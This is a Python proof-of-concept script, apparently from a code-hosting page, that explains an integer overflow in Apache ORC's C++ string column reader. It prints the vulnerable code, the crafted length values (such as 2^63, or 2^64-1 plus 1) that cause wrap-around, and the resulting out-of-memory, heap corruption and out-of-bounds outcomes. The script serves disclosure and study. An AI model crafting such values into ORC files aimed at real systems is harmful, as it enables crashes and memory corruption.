File size: 2,761 Bytes
ecf1516
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3
"""
PoC: Apache ORC String Length Integer Overflow
===============================================

Root cause: ColumnReader.cc:697
  totalLength += static_cast<size_t>(lengths[i]);
  // lengths[i] is int64_t from unsigned RLE decoder — NO negative check

String lengths decoded by unsigned RLE (isSigned=false, line 645)
are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
on negative int64_t produces huge size_t → OOM or wrap-to-zero.
"""
import struct

def show_overflow():
    print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
    print("=" * 60)
    print()
    print("Vulnerable code (ColumnReader.cc:691-706):")
    print("  size_t totalLength = 0;")
    print("  for (i = 0; i < numValues; ++i)")
    print("    totalLength += static_cast<size_t>(lengths[i]);  // NO CHECK!")
    print()
    print("How negative lengths occur:")
    print("  1. RLE decoder is unsigned (isSigned=false, line 645)")
    print("  2. Output stored in int64_t* (line 715-718)")
    print("  3. uint64 values >= 2^63 become negative int64_t")
    print("  4. static_cast<size_t>(negative) = huge positive")
    print()

    test_cases = [
        ("OOM DoS: single huge length", [2**63]),
        ("Wrap to 0: two lengths", [2**64 - 1, 1]),
        ("Wrap to 1: crafted pair", [2**64 - 100, 101]),
    ]

    for desc, uint_lengths in test_cases:
        print(f"Case: {desc}")
        total = 0
        for ul in uint_lengths:
            as_int64 = struct.unpack('q', struct.pack('Q', ul % (2**64)))[0]
            as_size_t = ul % (2**64)
            total = (total + as_size_t) % (2**64)
            print(f"  RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
        print(f"  totalLength = {total} ({total:#018x})")
        if total == 0:
            print("  -> blob.resize(0) -> EMPTY BLOB")
            print("  -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
        elif total < 1000:
            print(f"  -> blob.resize({total}) -> UNDERSIZED BUFFER")
            print("  -> actual data > blob size -> HEAP CORRUPTION")
        elif total > 2**40:
            print(f"  -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH")
        print()

    print("Additional: Stripe offset overflow (Reader.cc:591)")
    print("  stripeFooterStart = offset + index_length + data_length")
    print("  All uint64 from protobuf, no overflow check")
    print("  -> wraps around -> reads wrong file location")
    print()
    print("ORC C++ has ZERO safe arithmetic in core parsing code")
    print("  Reader.cc: 0 overflow checks in 1830 lines")
    print("  ColumnReader.cc: 0 overflow checks in 1793 lines")

if __name__ == "__main__":
    show_overflow()